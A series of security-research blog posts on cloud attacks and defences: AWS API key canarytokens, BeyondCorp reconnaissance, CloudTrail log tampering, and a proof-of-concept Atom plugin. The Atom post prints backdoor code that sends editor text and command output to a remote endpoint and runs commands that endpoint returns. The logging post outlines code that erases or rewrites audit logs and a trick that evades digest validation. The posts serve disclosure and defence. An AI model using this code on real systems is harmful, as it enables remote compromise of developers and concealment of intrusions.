Canarytokens' new member: AWS API key Canarytoken

This is the fourth post in a series highlighting bits from our recent BlackHat USA 2017 talk. An index of all the posts in the series is here.

Introduction

In this blog post, we will introduce you to the newest member of our Canarytokens family, the Amazon Web Services API key token. This new Canarytoken allows you to sprinkle AWS API keys around your environment, and notifies you when they are used. (If you stick around to the end, we will also share some of the details behind how we built it.)

Background

Amazon Web Services offers a massive range of services that integrate easily with each other. This encourages companies to build entire products and product pipelines on the AWS suite. To automate and manipulate AWS services through their API, we are given access keys, which can be restricted by AWS policies. Access keys are defined on a per-user basis, which means there are a few moving parts involved in locking down an AWS account securely.

Take it for a spin - using an AWS API key Canarytoken

Using the AWS API key Canarytoken is as simple as can be. Make use of the free token server at http://canarytokens.org or the private Canarytokens server built into your Canary console, and select the ‘AWS Keys’ token from the drop-down list.



Enter an email and a token reminder (remember: the email address is the one we will notify when the token is tripped, and the reminder will be attached to the alert. Choose a unique reminder; nothing sucks more than knowing a token has been tripped but being unsure where you left it). Then click on “Create my Canarytoken”.



You will notice that we arrange your credentials in the same way as the AWS console usually does, so you can get straight down to using (or testing) them. Let's get to testing. Click “Download your AWS Creds” and save the file somewhere you will find it.

For our tests, we are going to use the AWS command line tool (if you don’t have it yet, head over to http://docs.aws.amazon.com/cli/latest/userguide/installing.html). Below is a simple bash script that leverages the AWS command line tool to create a new user named TestMePlease using your new, almost-authentic AWS API keys.
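The original post embeds the script itself; a minimal sketch of what it does looks something like this (illustrative only):

#!/bin/bash
# Usage: ./test_aws_creds.sh <access_key_id> <secret_access_key>
export AWS_ACCESS_KEY_ID="$1"
export AWS_SECRET_ACCESS_KEY="$2"
export AWS_DEFAULT_REGION="us-east-1"   # IAM is global, but the CLI wants a region set

# Any IAM call will do; the attempt is denied (the token user has no privileges),
# but it is still logged, which is what trips the Canarytoken.
aws iam create-user --user-name TestMePlease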

Simply go to your command line, navigate to the same location as the script and type ./test_aws_creds.sh <access_key_id> <secret_access_key>. If all went to plan, you should receive an alert notifying you that your AWS API key Canarytoken was used.

NB: Due to the way these alerts are handled (by Amazon) it can sometimes take up to 20 minutes for the alert to come through.

Waiting...waiting...waiting (0-20mins later). Ah we got it!


Check...it...out! This is what your AWS API key Canarytoken alert will look like, delivered by email. The email contains useful details such as the User Agent, Source IP and a reminder of where you may have placed this Canarytoken (we always assumed you're not going to use only one! Why would you? They are free!!).

The simple plan then should be: Create a bunch of fake keys. Keep one on the CEO’s laptop. (He will never use it, but the person who compromises him will). Keep one on your webserver (again, no reason for it to be used, except by the guy who pops a shell on that box, etc)

Under the hood - steps to creating an AWS API key Canarytoken

The AWS API key Canarytoken makes use of a few AWS services to ensure that the Canarytoken is an actual AWS API key - indistinguishable from a real working AWS API key. This is important because we want to encourage attackers to have to use the key to find out how juicy it actually is - or isn’t. We also want this to be dead simple to use. Enter your details and click a button. If you want to see how the sausage is made, read on:


Creation - And on the 5th day…


The first service necessary for creating these AWS API key Canarytokens is an AWS Lambda that is triggered by an AWS API Gateway event. Let’s follow the diagram’s flow. Once you click the ‘Create my Canarytoken’ button, a GET request is sent to the AWS API Gateway. This request contains query parameters for the domain (of the Canarytokens server), the username (if we want to specify one, otherwise a random one is generated) and the actual Canarytoken that will be linked to the created AWS API key. This is where the free and commercial versions diverge slightly.

Our free version of Canarytokens (canarytokens.org) does not allow you to specify your own username for the AWS API key Canarytoken. The domain of the Canarytokens server is used in conjunction with the Canarytoken to create the AWS user on the account. (This is still completely useful, because the only way an attacker can obtain the username tied to the token is to make an API call, and that call itself will trigger the alert.) Our private Canary consoles enjoy a slightly different implementation: an AWS DynamoDB table links users to their tokens, allowing clients to specify what the username for their AWS user should be.

If the AWS API Gateway determines that sufficient information is included in the request, it triggers the lambda responsible for creating the AWS API key Canarytoken. This lambda creates a new user with no privileges on the AWS account, generates AWS API keys for that user and responds to the request with a secret access key and an access key id.
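A stripped-down sketch of such a lambda, written in Python with boto3, might look like the following (the query parameter names and username format here are our own illustration, not the production code):

import json
import boto3

iam = boto3.client("iam")

def lambda_handler(event, context):
    # Query string parameters forwarded by the API Gateway (illustrative names)
    params = event.get("queryStringParameters") or {}
    username = params.get("username") or "%s@@%s" % (params["domain"], params["token"])

    # A user with no attached policies, and an access key pair for it
    iam.create_user(UserName=username)
    key = iam.create_access_key(UserName=username)["AccessKey"]

    return {
        "statusCode": 200,
        "body": json.dumps({
            "access_key_id": key["AccessKeyId"],
            "secret_access_key": key["SecretAccessKey"],
        }),
    }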


We should note that the newly created user has no permissions (to anything), so anyone with this AWS API key can’t do anything of importance. (Even if they did, it's a user on our infrastructure, not yours!) Of course, before the attacker is able to find out how impotent her key is, she first has to use it, and this is when we catch her out (detection time!).

Detection - I see you! 

Now that the AWS API key has been created and returned to the user, let's complete the loop and figure out when these AWS API keys are being used. The first service in our detection process, spoken about in our previous posts, is CloudTrail. CloudTrail is super useful when monitoring anything on an AWS account because it logs most important API calls (though not all of them), recording the username, the keys used, the methods called, the user-agent information and a whole lot more.

We configure CloudTrail to send its logs to another AWS logging service known as CloudWatch Logs. This service allows subscription and filtering rules to be applied. If a condition in the logs arriving from CloudTrail is met, CloudWatch triggers whichever service you configure it to - in our case another AWS Lambda function. In pure AWS terms, we have created a subscription filter which sends logs that match the given filter to our chosen lambda.

For the AWS API key Canarytoken, we use a subscription filter such as

  • "FilterPattern": "{$.userIdentity.type = IAMUser}"

This filter checks the incoming logs from CloudTrail and only passes on events where the user identity type is IAMUser - which distinguishes them from calls made with root credentials, where the identity type is ‘Root’.
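Setting that up programmatically is roughly one call against the CloudWatch Logs API (a sketch; the log group name and lambda ARN below are placeholders, and note that the filter syntax wants the string value quoted):

import boto3

logs = boto3.client("logs")

logs.put_subscription_filter(
    logGroupName="CloudTrail/DefaultLogGroup",   # the log group CloudTrail delivers to
    filterName="canarytoken-iam-user-activity",
    filterPattern='{ $.userIdentity.type = "IAMUser" }',
    destinationArn="arn:aws:lambda:us-east-1:123456789012:function:canarytoken-alerter",
)

(The destination lambda also needs a resource policy allowing CloudWatch Logs to invoke it.)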

Alert - Danger Will Robinson, danger!

All that's left now is for us to generate our alert. We employ an AWS Lambda (again) to help us with this. This lambda receives the full log of the attempted AWS API call and bundles it into a custom HTTP request that trips the Canarytoken. Our Canarytokens server receives the request with all this information and relays the alert to you, neatly formatted.
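In outline, that lambda looks something like this (a sketch, with a placeholder URL standing in for the real Canarytokens endpoint and field names chosen for illustration):

import base64
import gzip
import json
import urllib.parse
import urllib.request

CANARYTOKEN_URL = "https://canarytokens.example/trip"   # placeholder

def lambda_handler(event, context):
    # CloudWatch Logs hands matched events to the lambda base64-encoded and gzipped
    payload = gzip.decompress(base64.b64decode(event["awslogs"]["data"]))
    for log_event in json.loads(payload)["logEvents"]:
        record = json.loads(log_event["message"])   # the full CloudTrail record
        body = urllib.parse.urlencode({
            "user": record["userIdentity"].get("userName", ""),
            "ip": record.get("sourceIPAddress", ""),
            "user_agent": record.get("userAgent", ""),
            "event_name": record.get("eventName", ""),
        }).encode()
        urllib.request.urlopen(CANARYTOKEN_URL, data=body)   # this trips the token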

Summary - TLDR;

Amazon Web Services is a massive collection of easily integrated services, which enables companies of all sizes to build entire products and services with relative ease. This makes AWS API keys an attractive target for many attackers.

The AWS API key Canarytoken allows the creation of real AWS API keys which can be strewn around your environment. An attacker using these credentials will trigger an alert informing you of their presence (along with other useful metadata). It’s quick, simple, reliable and a high-quality indicator of badness.

Farseeing: a look at BeyondCorp

This is the third post in a series highlighting bits from our recent BlackHat USA 2017 talk. An index of all the posts in the series is here.


Introduction

In our BlackHat talk, "Fighting the Previous War", we showed how attacks against cloud services and cloud-native companies are still in their nascent stages of evolution. The number of known attacks against AWS is small, which is at odds with the huge number (and complexity) of services available. It's not a deep insight to argue that the number of classes of cloud-specific attacks will rise.

However, the "previous war" doesn't just refer to cloud stuff. While our talk primarily dealt with cloud services, we also spent some time on another recent development, Google's BeyondCorp. In the end, the results weren't exciting enough to include fully in the talk and so we cut slides from the presentation, but the original slides are in the PDF linked above.

In this post we'll provide our view on what BeyondCorp-like infrastructure means for attackers, and how it'll affect their approaches.

What is BeyondCorp?

We start with a quick overview of BeyondCorp that strips out less important details (Google has a bunch of excellent BeyondCorp resources if you've never encountered it before.)

In an ossified corporate network, devices inside the perimeter are more trusted than devices outside the perimeter (e.g. they can access internal services which are not available to the public Internet). In addition, devices trying to access those services aren't subject to checks on the device itself (such as whether the device is known, or is fully patched).

In the aftermath of the 2009 Aurora attacks on Google, where attackers had access to internal systems once the boundary perimeter was breached, Google decided to implement a type of Zero Trust network architecture. The essence of the new architecture was that no trust was placed in the location of a client, regardless of whether the client was located inside a Google campus or sitting on Starbucks wifi. They called it BeyondCorp.

Under BeyondCorp, all devices are registered with Google beforehand and all access to services is brokered through a single Access Proxy called ÜberProxy.

This means that all Google's corporate applications can be accessed from any Internet-connected network, provided the device is known to Google and the user has the correct credentials (including MFA, if enabled.)

Let's walk through a quick example. Juliette is a Google engineer sitting in a Starbucks leeching their wifi, and wants to review a bug report on her laptop. From their documentation, it works something like this (we're glossing over a bunch of details):
  1. Juliette's laptop has a client certificate previously issued to her machine.
  2. She opens https://tickets.corp.google.com in her browser.
  3. The DNS response is a CNAME pointing to uberproxy.l.google.com (this is the Access Proxy). The hostname identifies the application.
  4. Her browser connects using HTTPS to uberproxy.l.google.com, and provides its client certificate. This identifies her device.
  5. She's prompted for credentials if needed (there's an SSO subsystem to handle this). This identifies her user.
  6. The proxy passes the application name, device identifier (taken from the client certificate), and credentials to the Access Control Engine (ACE).
  7. The ACE performs an authorization check to see whether the user is allowed to access the requested application from that device.
  8. The ACE has access to device inventory systems, and so can reason about device trust indicators such as:
    1. a device's patch level
    2. its trusted boot status
    3. when it was last scanned for security issues
    4. whether the user has logged in from this device previously
  9. If all the ACE's checks pass, the access proxy allows the request through to the corporate application; otherwise the request fails.
Google's architecture diagrams include more components than we've mentioned above (and the architecture changed between their first and most recent papers on BeyondCorp). But the essence is a proxy that can reason about device status and user trust. Note that it's determining whether a user may access a given application, not what they do within those applications.

One particularly interesting aspect of BeyondCorp is how Google supports a bunch of protocols (including RDP and SSH) through the same proxy, but we won't look at that today. (Another interesting aspect is that Google managed to migrate their network architecture without interruption; this is perhaps the biggest takeaway from their series of papers. It's an amazingly well planned migration.)

This sucks! (For attackers)

For ne'er-do-wells, this model changes how they go about their business. 

Firstly, tying authorisation decisions to devices has a big limiting effect on credential phishing. A set of credentials is useless to an external attacker if the authorisation decision includes an assertion that the device has previously been used by this user. Impersonation attacks like this become much more personal, as they require device access in addition to credentials.

Secondly, even if a beachhead is established on an employee's machine, there's no flat network to move laterally across. All the attacker can see are the applications to which the victim account has been granted access. So application-level attacks become paramount in order to move laterally across accounts (and then services).

Thirdly, access is fleeting. The BeyondCorp model actively incorporates updated threat information, so that (for example), particular browser versions can be banned en masse if 0days are known to be floating around. 

Fourthly, persistence on end user devices is much harder. Google use verified boot on some of their devices, and BeyondCorp can take this into account. On verified boot devices, persistence is unlikely to take the form of BIOS or OS-level functionality (these are costly attacks with step changes across the fleet after discovery, making them poor candidates). Instead, higher level client-side attacks seem more likely.

Fifthly, in addition to application attacks, bugs in the Access Control Engine or mistakes in the policies come into play, but these must be attacked blind as there is no local version to deploy or examine.

Lastly, targeting becomes really important. It's not enough to spam random @target.com addresses with dancingpigs.exe and then get your bearings once inside the network. There is no "inside the network"; at best you access someone's laptop, and can hit the same BeyondCorp apps as your victim.

A quick look at targeting

The lack of a perimeter is the defining characteristic of BeyondCorp, but that means anyone outside Google has a similar view to anyone inside Google, at least for the initial bits needed to bootstrap a connection.

We know all services are accessed through the ÜberProxy. In addition, every application gets a unique CNAME (in a few domains we've seen, like corp.google.com, and googleplex.com).

DNS enumeration is a well-mapped and frequently-trod path, and effective at discovering corporate BeyondCorp applications. Pick a DNS enumeration tool (like subbrute), run it across the corp.google.com domain, and get 765 hostnames. Each maps to a Google corporate application. Here's a snippet from the output:
  • [...]
  • pitch.corp.google.com
  • pivot.corp.google.com
  • placer.corp.google.com
  • plan.corp.google.com
  • platform.corp.google.com
  • platinum.corp.google.com
  • plato.corp.google.com
  • pleiades.corp.google.com
  • plumeria.corp.google.com
  • [...]
But DNS isn't the only place to identify BeyondCorp sites. As is the fashion these days, Google is quite particular about publishing new TLS certificates in the Certificate Transparency logs. These include a bunch of hostnames in corp.google.com and googleplex.com. From these, more BeyondCorp applications were discovered.
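As an aside, mining the CT logs for this is a few lines of work; a sketch using crt.sh's JSON interface (one of several public CT search services, and not necessarily what we used at the time):

import json
import urllib.request

url = "https://crt.sh/?q=%25.corp.google.com&output=json"
with urllib.request.urlopen(url) as response:
    entries = json.loads(response.read())

# Each entry's name_value can hold several hostnames, one per line
hostnames = sorted({name for entry in entries
                    for name in entry["name_value"].splitlines()})
for hostname in hostnames:
    print(hostname)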

Lastly, we scraped the websites of all the hostnames found to that point and found additional hostnames referenced in some of the pages and redirects. For fun, we piped the list into PhantomJS and screencapped all the sites for quick review.

Results? We don't need no stinking results!


The end result of this little project was a few thousand screencaps of login screens:

Quite a few errors showing "my device isn't allowed access to this service", the occasional straight 403, and so, so many login screens.
Results were not exciting. The only site that was open to the Internet was a Cafe booking site on one of Google's campuses.

However, a few weeks ago a high school student posted the story of his bug bounty which appeared to involve an ÜberProxy misconfiguration. The BeyondCorp model explicitly centralises security and funnels traffic through proxy chokepoints to ease authN and authZ decisions. Like any centralisation, it brings savings but there is also the risk of a single issue affecting all applications behind the proxy. The takeaway is that mistakes can (and will) happen. 


So where does this leave attackers?

By no means is this the death of remote attacks, but it shifts focus from basic phishing attacks and will force attackers into more sophisticated plays. These will include narrower targeting (of the BeyondCorp infrastructure in particular, or of specific end users with the required application access), and will change how persistence on endpoints is achieved. Application persistence increases in importance, as endpoint access becomes more fleeting.

With all this said, it's unlikely an attacker will encounter a BeyondCorp environment in the near future, unless they're targeting Google. There are a handful of commercial solutions which claim BeyondCorp-like functionality, but none matches the thoroughness of Google's approach. For now, these BeyondCorp attack patterns remain untested.

Disrupting AWS S3 Logging

This post continues the series of highlights from our recent BlackHat USA 2017 talk. An index of all the posts in the series is here.


Introduction

Before today's public clouds, best practice was to store logs separately from the host that generated them. If the host was compromised, the logs stored off it would have a better chance of being preserved.

At a cloud provider like AWS, a storage service within an account holds your activity logs. A sufficiently thorough compromise of an account could very well lead to disrupted logging and heightened pain for IR teams. It's analogous to logs stored on a single compromised machine: once access restrictions to the logs are overcome, logs can be tampered with and removed. In AWS, however, removing and editing logs looks different to wiping logs with rm -rf.

In AWS jargon, the logs originate from a service called CloudTrail. A Trail is created which delivers the current batch of activity logs in a file to a pre-defined S3 bucket at variable intervals. (Logs can take up to 20 mins to be delivered).

CloudTrail logs are often collected in the hope that, should a breach be discovered, there will be a useful audit trail in the logs. The logs are the only public record of what happened while the attacker had access to an account, and form the basis of most AWS defences. If you haven't enabled them on your account, stop reading now and do your future self a favour.

Prior work

In his blog post, Daniel Grzelak explored several fun consequences of the fact that logs are stored in S3. For example, he showed that when a file lands in an S3 bucket, it triggers an event. A function, or Lambda in AWS terms, can be made to listen for this event and delete logs as soon as they arrive. The logs continue to arrive as normal (except that they evaporate on arrival).

Flow of automatic log deletion
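In rough outline, such a lambda amounts to very little code (this is a sketch of the idea, not Daniel's actual implementation):

import boto3

s3 = boto3.client("s3")

def lambda_handler(event, context):
    # Triggered by ObjectCreated events on the CloudTrail logs bucket:
    # delete each log file the moment it is delivered.
    for record in event["Records"]:
        bucket = record["s3"]["bucket"]["name"]
        key = record["s3"]["object"]["key"]
        s3.delete_object(Bucket=bucket, Key=key)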

Versions, lambdas and digests

Adding "versioning" to S3 buckets (which keeps older copies of files once they are overwritten) won't help, if an attacker can grant permission to delete the older copies. Versioned buckets do have the option of having versioned items protected from deletion by multi-factor auth ("MFA-delete"). Unfortunately it seems like only the AWS account's root user (as the sole owner all S3 buckets in an account) can configure this, making it less easy to enable in typical setups where root access is tightly limited.

In any case, an empty logs bucket will inevitably raise the alarm when someone comes looking for logs. This leaves the attacker with a pressing question: how do we erase our traces but leave the rest of the logs available and readable? The quick answer is that we can modify the lambda to check every log file and delete any dirty log entries before overwriting them with a sanitised log file.

But a slight twist is needed: when modifying logs, the lambda itself generates more activity, which in turn adds more dirty entries to the logs. By adding a unique tag to the names of the pieces of the log-sanitiser (such as the names of the policies, roles and lambdas), these can be deleted like any other dirty log entries, so that the log-sanitiser eats its own trail. In this code snippet, any role, lambda or policy that includes thinkst_6ae655cf will be kept out of the logs.
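The snippet itself isn't reproduced here, but the core of such a sanitiser is small; a sketch of the approach (filtering on the tag alone, where the real thing would also scrub the attacker's own keys and usernames):

import gzip
import json
import boto3

s3 = boto3.client("s3")
DIRTY_TAG = "thinkst_6ae655cf"   # anything mentioning this tag is scrubbed, including the sanitiser itself

def lambda_handler(event, context):
    for record in event["Records"]:
        bucket = record["s3"]["bucket"]["name"]
        key = record["s3"]["object"]["key"]
        # CloudTrail log files are gzipped JSON with a top-level "Records" array
        body = s3.get_object(Bucket=bucket, Key=key)["Body"].read()
        log = json.loads(gzip.decompress(body))
        log["Records"] = [r for r in log["Records"] if DIRTY_TAG not in json.dumps(r)]
        s3.put_object(Bucket=bucket, Key=key,
                      Body=gzip.compress(json.dumps(log).encode()))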

That would seem to present a complete solution, except that AWS CloudTrail also offers log validation (aimed specifically at mitigating silent changes to logs after delivery). At regular intervals, the trail delivers a (signed) digest file that attests to the contents of all the log files delivered in the past interval. If a log file covered by the digest changes, validation of that digest file fails.

A slew of digest files

At first glance this stops our modification attack in its tracks; our lambda modified the log after delivery, but the digest was computed on the contents prior to our changes. So the contents and the digest won't match.

Also covered by each digest file is the previous digest file. This creates a chain of log validation starting at the present and going back up the chain into the past. If the previous digest file has been modified or is missing, the next digest file's validation will fail (but subsequent digests will be valid). The intent behind this is clear: if logs are tampered with, AWS command line log validation should show an error.

Chain of digests and files they cover
Contents of a digest file



It would seem that one option is to simply remove digest files, but S3 protects them and prevents deletion of files that are part of an unbroken digest chain.

There's an important caveat to be aware of though: when log validation is stopped and started on a Trail (as opposed to stopping and starting the logging itself), the log validation chain is broken in an interesting way. The next digest file that is delivered doesn't refer to the previous digest file from before validation was stopped and started. Instead, the next digest file references null as its previous file, as if it's a new digest chain starting afresh.

Digest file (red) that can be deleted following a stop-start
In the diagram above, after the log files in red were altered, log validation was stopped and started. This broke the link between digest 1 and digest 2.
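For reference, toggling validation is a single API call each way; something like this (a sketch, with a placeholder trail name):

import boto3

cloudtrail = boto3.client("cloudtrail")

# Stop and restart log file validation (not logging itself). The next digest
# delivered starts a fresh chain whose first entry points at null instead of
# the previous digest.
cloudtrail.update_trail(Name="my-trail", EnableLogFileValidation=False)
cloudtrail.update_trail(Name="my-trail", EnableLogFileValidation=True)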

Altered logs, successful validation

We said that S3 prevented digest file deletion on unbroken chains. However, older digest files can be removed so long as no other file refers to them. That means we can delete digest 1, then delete digest 0.

What this means is that we can now delete the latest digest file on the previous validation chain without failing any digest validation. The validation starts at the most recent chain and moves back up; when it reaches the start of a chain, it simply moves on to the latest available item of the previous chain. (There may be a note about no log files being delivered for a period, but that's the same message that appears when no log files were delivered during that period anyway.)

No validity complaints about missing digest files

And now?

It's easy to imagine that log validation is simply included in automated system health-checks; so long as it doesn't fail, no one will be verifying logs.  Until they're needed, of course, at which point the logs could have been changed without validation producing an error condition.

The signature of this attack is that validation was stopped and started (rather than logging being stopped and started). It underscores the importance of alerting on CloudTrail updates, even those that don't stop logging. (One way would be to alert on UpdateTrail events using the AWS CloudWatch service.) After a single validation stop-start event, it is no longer safe to assume that the AWS CLI tool reporting that all logs validate means the logs haven't been tampered with. Log validation should be treated as especially suspect if there are breaks in the digest validation chain, which would have to be verified manually.
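One way to wire that up (a sketch; the log group and metric names are placeholders) is a CloudWatch Logs metric filter on UpdateTrail events, with a CloudWatch alarm on the resulting metric:

import boto3

logs = boto3.client("logs")

logs.put_metric_filter(
    logGroupName="CloudTrail/DefaultLogGroup",
    filterName="cloudtrail-updatetrail",
    filterPattern='{ $.eventName = "UpdateTrail" }',
    metricTransformations=[{
        "metricName": "UpdateTrailEvents",
        "metricNamespace": "Security",
        "metricValue": "1",
    }],
)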

Much like logs stored on a single compromised host, logs should be interpreted with care when we are dealing with compromised AWS accounts that had the power to alter them.

All your devs are belong to us: how to backdoor the Atom editor

This is the first post in a series highlighting bits from our recent BlackHat USA 2017 talk. An index of all the posts in the series is here.

Introduction

In this post we'll be looking at ways to compromise your developers that you probably aren't defending against, by exploiting the plugins in their editors. We will therefore be exploring Atom, Atom plugins, how they work and the security shortfalls they expose.

Targeting developers seems like a good idea (targeting sysadmins is so 2014). If we can target them through a channel that you probably aren't auditing, that's even better!

Background

We all need some type of editor in our lives to be able to do the work that we do. But, when it comes to choosing an editor, everyone has their own views. Some prefer modern editors like Atom or Sublime, while others are more die-hard/old-school and prefer to stick to Vim or Emacs. Whatever you choose, you'll most likely want to customize it in some way (if not, I am not sure I can trust you as a person, let alone a developer).

Plugins and extensions on modern editors are robust. Aside from cosmetic customization (font, color scheme, etc.) they also give you a range of functionality to make your life easier: from autocomplete and linters to minimaps, beautifiers and git integration, you should be able to find a plugin that suits your needs. If you don't, you can just create and publish one.

Other users will download new plugins to suit their needs, continuously adding to their ever growing list of them (because who has the time to go back and delete old unused plugins?) Many editors support automatic updates to ensure that any bugs are fixed and new features are enjoyed immediately.

For this post I'll focus specifically on Atom, GitHub's shiny new editor. According to their site it's a "hackable text editor for the 21st century" (heh!). Atom's user base is continuously growing, along with its vast selection of packages. You can even install Atom on your Chromebook with a few hacks, which bypasses the basic security model on ChromeOS.

The Goal

I was tasked with exploring the extent of damage that a malicious Atom plugin could do. We weren't sure what obstacles we'd face or what security measures were in place to stop us being evil. It turns out there were none... within a couple of hours I had not only published my first package, but had updated it to include a little bit of malicious code too.

The plan was simple:


Step One:  Get a simple package (plugin) published
  • What was required and how difficult would it be (would our package need to be vetted)?
Step Two:  Test the update process
  • If you were going to create a malicious package, you'd first create a useful non-malicious one that would attract a large user base, and then push an update that injects the unsavory code.
Step Three:  Actually test what we could achieve from within an Atom package
  • We'd need to determine if there was any form of sandboxing, what libraries we'd have access to, etc.

Hello Plugin

Step One

This was trivially simple. There are lots of guides to creating and publishing packages for Atom out there, including a detailed one on their site.  

Generate a new package:

cmd + shift + p
Package Generator: Generate Package 

This will give you a package with a simple toggle method that we will use later:

toggle: ->
    console.log 'touch-type-teacher was toggled!'

Push the code to a Git repo:

git init
git add .
git commit -m "First commit"
git remote add origin <remote_repo_url>
git push -u origin master

Publish your Atom package 

apm-beta publish minor

Step Two

This was even easier seeing as the initial setup was complete:  

Make a change:

toggle: ->
    console.log 'touch-type-teacher was toggled!'
    console.log 'update test'

Push it to Github:

git commit -a -m 'Add console logging'
git push

Publish the new version:

apm-beta publish minor

So that's steps one and two done, showing how easy it is to publish and update your package. The next step was to see what could actually be done with your package.


That seems like a reasonable request

Step Three

Seeing as packages are built on node.js, the initial test was to see what modules we had access to.

The request package seemed a good place to start as it would allow us to get data off the user's machine and into our hands.

Some quick digging found that it was easy to add a dependency to our package:

npm install --save request@2.73.0
apm install

Import this in our code:

request = require 'request'

Update our code to post some data to our remote endpoint:

toggle: ->
    request 'http://my-remote-endpoint.com/run?data=test_data', (error, response, body) =>            
        console.log 'Data sent!'

With this, our package will happily send information to us whenever toggled.

Now that we have a way to get information out, we needed to see what kind of information we had access to.

Hi, my name is...

Let's change our toggle function to try and get the current user and post that:

toggle: ->
    {spawn} = require 'child_process'
    test = spawn 'whoami'
    test.stdout.on 'data', (data) ->
        request 'http://my-remote-endpoint.com/run?data='+data.toString().trim(), (error, response, body) =>
            console.log 'Output sent!'

This actually worked too... meaning we had the ability to run commands on the user's machine and then extract the output from them if needed.

At this point we had enough information to write it up, but we took it a little further (just for kicks).

Simon Says

Instead of hardcoding commands into our code, let's send it commands to run dynamically! While we are at it, instead of only firing on toggling of our package, let's fire whenever a key is pressed.

First we'll need to hook onto the onChange event of the current editor:

module.exports = TouchTypeTeacher =
  touchTypeTeacherView: null
  modalPanel: null
  subscriptions: null
  editor: null

  activate: (state) ->
    @touchTypeTeacherView = new TouchTypeTeacherView(state.touchTypeTeacherViewState)
    @modalPanel = atom.workspace.addModalPanel(item: @touchTypeTeacherView.getElement(), visible: false)
    @editor = atom.workspace.getActiveTextEditor()
    @subscriptions = new CompositeDisposable

    @subscriptions.add atom.commands.add 'atom-workspace', 'touch-type-teacher:toggle': => @toggle()
    @subscriptions.add @editor.onDidChange (change) => @myChange()

Then create the myChange function that will do the dirty work:

myChange: ->
    # Send the editor's current contents to our endpoint; the response body is a command to run
    request 'http://my-remote-endpoint.com/test?data=' + @editor.getText(), (error, response, body) =>
        {spawn} = require 'child_process'
        test = spawn body
        console.log 'External code to run:\n' + body
        # Ship the command's output back to the endpoint
        test.stdout.on 'data', (data) ->
            console.log 'sending output'
            request 'http://my-remote-endpoint.com/run?data=' + data.toString().trim(), (error, response, body) =>
                console.log 'output sent!'

What happens in this code snippet is a bit of overkill but it demonstrates our point. On every change in the editor we will send the text in the editor to our endpoint, which in turn returns a new command to execute. We run the command and send the output back to the endpoint.

Demo

Below is a demo of it in action. On the left you'll see the user typing into the editor, and on the right you'll see the logs on our remote server.

[Video demo]


Our little plugin is not going to be doing global damage anytime soon. In fact we unpublished it once our tests were done. But what if someone changed an existing plugin which had lots of active users? Enter Kite.

Kite and friends

While we were ironing out the demo and wondering how prevalent this kind of attack was, an interesting story emerged. Kite, who make cloud-based coding tools, hired the developer of Minimap (an Atom plugin with over 3.8 million downloads) and pushed an update for it labelled "Implement Kite promotion". This update, among other things, inserted Kite ads onto the minimap.

In conjunction with this, it was found that Kite had silently acquired autocomplete-python (another popular Atom plugin) a few months prior and had promoted the use of Kite over the open source alternative.

Once discovered, Kite was forced to apologize and take steps to ensure they would not do it again (but someone else totally could!).

Similar to the Kite takeover of Atom packages (but with more malicious intent), in the past week it has been reported that two Chrome extensions were taken over by attackers and had adware injected into them. Web Developer for Chrome and Copyfish both fell victim to the same phishing attack. Details of the events can be read here (Web Developer) and here (Copyfish), but the gist of it is that popular Chrome extensions were compromised and their users fell victim without knowing it.

Wrapping up

We created a plugin and published it without it being picked up as malicious. This plugin runs without a sandbox and without a restrictive permissions model to prevent us stealing all the information the user has access to. Even if there were some kind of code analysis conducted on uploaded code, it's possible to remotely eval() code at runtime. Automatic updates mean that even if our plugin is benign today, it could be malicious tomorrow.

Forcing developers to use only a certain controlled set of tools/plugins seems draconian, but if the toolchain isn't controlled, it's getting more and more difficult to secure.



BlackHat 2017 Series

[Update: jump to the end of the page for the series index]

Late July found Haroon and me sweating buckets inside an 8th storey Las Vegas hotel room. Our perspiration was due not to the malevolent heat outside but to the 189 slides we were building for BlackHat 2017. Modifications to the slide deck continued until just before the talk, and we're now posting a link to the final deck. Spoiler alert: it's at the bottom of this post.

A few years ago (2009, but who's counting) we spoke at the same conference and then at DEF CON on Clobbering the Cloud. It's a little hard to recall the zeitgeist of bygone times, but back then the view that "the Cloud is nothing new" was prominent in security circles (and, more broadly, in IT). The main thrust of the previous talk was taking aim at that viewpoint, showing a bunch of novel attacks on cloud providers and how things were changing:


Eight years on, and here we are again talking about Cloud. In the intervening years we've built and run a cloud-reliant product company, and securing that chews up a significant amount of our time. With the benefit of actual day-to-day usage and experience we took another crack at Cloud security. This time the main thrust of our talk was:


In our 2017 talk we touch on a bunch of ways in which security teams are often still hobbled by a view of Cloud computing that's rooted in the past, while product teams have left most of us in the dust. We discuss insane service dependency graphs and we show how simple examples of insignificant issues in third parties boomerang into large headaches. We talk about software supply-chain attacks on your developers through malicious Atom plugins. Detection is kinda our bag, so we're confident saying that there's a dearth of options in the Cloud space, and go to some lengths to show this. We cover seldom-examined attack patterns in AWS, looking at recon, compromise, lateral movement, privesc, persistence and logging disruption. Lastly we took an initial swing at BeyondCorp, the architecture improvement from Google that's getting a bunch of attention.

We'd be remiss in not mentioning Atlassian's Daniel Grzelak who has been developing attacks against AWS for a while now. He's been mostly a lone voice on the topic.

One of our takeaways is that unless you're one of the few large users of cloud services, it's unlikely you're in a position to devote enough time to understanding the environment. This is a scary proposition, as the environment is not fully understood even by the large players. You thought Active Directory was complex? You can host your AD at AWS; it's one of 74 possible services you can run there.

The talk was the result of collaboration between a bunch of folks here at Thinkst. Azhar, Jason, Max and Nick all contributed, and in the next few weeks we'll be seeing posts from them talking about specific sub-topics they handled. We'll update this post as each new subtopic is added.

The full slidedeck is available here.

Posts in this series


  1. All your devs are belong to us: how to backdoor the Atom editor
  2. Disrupting AWS S3 Logging
  3. Farseeing: a look at BeyondCorp
  4. Canarytokens' new member: AWS API key Canarytoken

A guide to Birding (aka: Tips for deploying Canaries)

Here's a quick, informal guide to deploying birds. It isn't a Canary user guide and should:
  • be a fun read;
  • be broadly applicable. 
One of Canary's core benefits is that they are quick to deploy (under 5 minutes from the moment you unbox one), but this guide should seed some ideas for using them to maximum effect.

Grab the Guide Here (No registration, No Tracking Link, No Unnecessary Drama)

If you have thoughts, comments, or ideas, hit us back at info@canary.tools or DM us on twitter @thinkstCanary

Get notifications when someone accesses your Google Documents (aka: having fun with Google Apps Script)


Our MS Word and PDF tokens are a great way to see if anyone is snooping through your documents. One simply places the document in an enticing location and waits. If the document is opened, a notification (containing useful information about the viewer) is sent to you. Both MS Word tokens and PDF tokens work by embedding a link to a resource in the tokened document. When the document is opened an attempt to fetch the resource is made. This is the request which tickles the token-server, which leads to you being notified.

Because so many of us store content on Google Drive, we wanted to do something similar with Google Documents and Google Sheets. The embedded-image approach was possible in Google Sheets; however, due to image caching, coupled with weak API support for Google Documents, we turned to Google Apps Script.

